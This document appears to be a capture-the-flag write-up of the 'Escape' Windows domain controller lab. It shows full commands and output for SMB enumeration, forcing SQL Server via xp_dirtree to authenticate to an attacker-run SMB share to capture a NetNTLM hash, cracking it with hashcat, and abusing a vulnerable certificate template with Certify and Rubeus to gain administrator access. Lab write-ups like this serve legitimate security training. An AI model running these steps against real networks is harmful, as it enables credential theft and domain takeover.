Escape

Enumeration

Rustscan

sudo rustscan -t 1500 -b 1500 --ulimit 65000 -a 10.10.11.202 -- -sV -sC -oA ./{{ip}}

Ports

Open 10.10.11.202:53
Open 10.10.11.202:88
Open 10.10.11.202:135
Open 10.10.11.202:139
Open 10.10.11.202:389
Open 10.10.11.202:445
Open 10.10.11.202:464
Open 10.10.11.202:593
Open 10.10.11.202:636
Open 10.10.11.202:1433
Open 10.10.11.202:3268
Open 10.10.11.202:3269
Open 10.10.11.202:5985
Open 10.10.11.202:9389

Services

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-03-08 01:48:42Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl           syn-ack ttl 127
1433/tcp  open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl           syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 63970/tcp): CLEAN (Timeout)
|   Check 2 (port 6410/tcp): CLEAN (Timeout)
|   Check 3 (port 50586/udp): CLEAN (Timeout)
|   Check 4 (port 55857/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-03-08T01:49:35
|_  start_date: N/A
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m58s

CrackMapExec

The guest user has read access to Public

cme smb 10.10.11.202 --shares -u 'guest' -p ''

SMB         10.10.11.202    445    DC
SMB         10.10.11.202    445    DC               [+] sequel.htb\guest: 
SMB         10.10.11.202    445    DC               [+] Enumerated shares
SMB         10.10.11.202    445    DC               Share           Permissions     Remark
SMB         10.10.11.202    445    DC               -----           -----------     ------
SMB         10.10.11.202    445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.202    445    DC               C$                              Default share
SMB         10.10.11.202    445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.202    445    DC               NETLOGON                        Logon server share 
SMB         10.10.11.202    445    DC               Public          READ            
SMB         10.10.11.202    445    DC               SYSVOL                          Logon server share

SMB

I used smbmap to check if any files are present on the Public share

smbmap -u "guest" -p "" -R Public -H 10.10.11.202

[+] IP: 10.10.11.202:445        Name: sequel.htb                                        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        Public                                                  READ ONLY
        .\Public\*
        dr--r--r--                0 Sat Nov 19 12:51:25 2022    .
        dr--r--r--                0 Sat Nov 19 12:51:25 2022    ..
        fr--r--r--            49551 Sat Nov 19 12:51:25 2022    SQL Server Procedures.pdf

Lets download the file using smbclient

smbclient //10.10.11.202/Public
get "SQL Server Procedures.pdf"

Great the file contains some credentials to connect to the sqlserver

Foothold

Exploitation

SQLServer: Steal NetNTLM Hash

After connecting to the sqlserver using impacket-mssqlclient I discovered that I'm able to use xp_dirtree

Enumeration

SQL> EXEC sp_helprotect 'xp_dirtree';
Owner    Object                 Grantee        Grantor   ProtectType   Action           Column   

------   --------------------   ------------   -------   -----------   --------------   ------   

sys      xp_dirtree             public         dbo       b'Grant     '   Execute          .

Exploitation

First I setup a smbserver on our attacking machine

impacket-smbserver -smb2support smb ./smb

Next part is to execute xp_dirtree to get a connection on our smbshare

EXEC master.sys.xp_dirtree '\\10.10.14.36\smb'

Got the hash

[*] Incoming connection (10.10.11.202,52872)
[*] AUTHENTICATE_MESSAGE (sequel\sql_svc,DC)
[*] User DC\sql_svc authenticated successfully
[*] sql_svc::sequel:aaaaaaaaaaaaaaaa:CENSORED:CENSORED

Cracking the hash is also working just fine

hashcat -m 5600 -a 0 hash /usr/share/wordlists/rockyou.txt
SQL_SVC::sequel:CENSORED:CENSORED:CENSORED:CENSORED

Leaked Passwords

Using evil-winrm I was able to get access to the system While checking for interesting files I stumbled across a SQLServer Log called ERRORLOG.BAK

In that file we can identify a new user account and a password

2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'CENSORED'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]

Escalation

Local Enumeration

As always I started to enumerate again using the newly gathered credentials First thing I checked was the groups I'm in which made me aware to check for an AD Certificate Service

GROUP INFORMATION
-----------------
Everyone
BUILTIN\Remote Management Users
BUILTIN\Users
BUILTIN\Pre-Windows 2000 Compatible Access
BUILTIN\Certificate Service DCOM Access
NT AUTHORITY\NETWORK
NT AUTHORITY\Authenticated Users
NT AUTHORITY\This Organization
NT AUTHORITY\NTLM Authentication

Checking for vulnerable Certificate Templates

.\Certify.exe find /vulnerable

[!] Vulnerable Certificates Templates :

CA Name                               : dc.sequel.htb\sequel-DC-CA
Template Name                         : UserAuthentication
Schema Version                        : 2
Validity Period                       : 10 years
Renewal Period                        : 6 weeks
msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
...

Exploitation

Certificate: Localadmin

I'll now generate a new certificate using certify.exe for the user Administrator

.\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator

Convert the certificate for later usage with rubeus

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

After transferring the converted certificate to my target I use it to generate a TGT and display the NTLM hash to use it with evil-winrm

.\Rubeus.exe asktgt /user:administrator /certificate:admin.pfx /getcredentials

Administrator

evil-winrm -H "CENSORED" -u "administrator" -i 10.10.11.202

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         3/7/2023   1:34 PM             34 root.txt

Last updated 2 years ago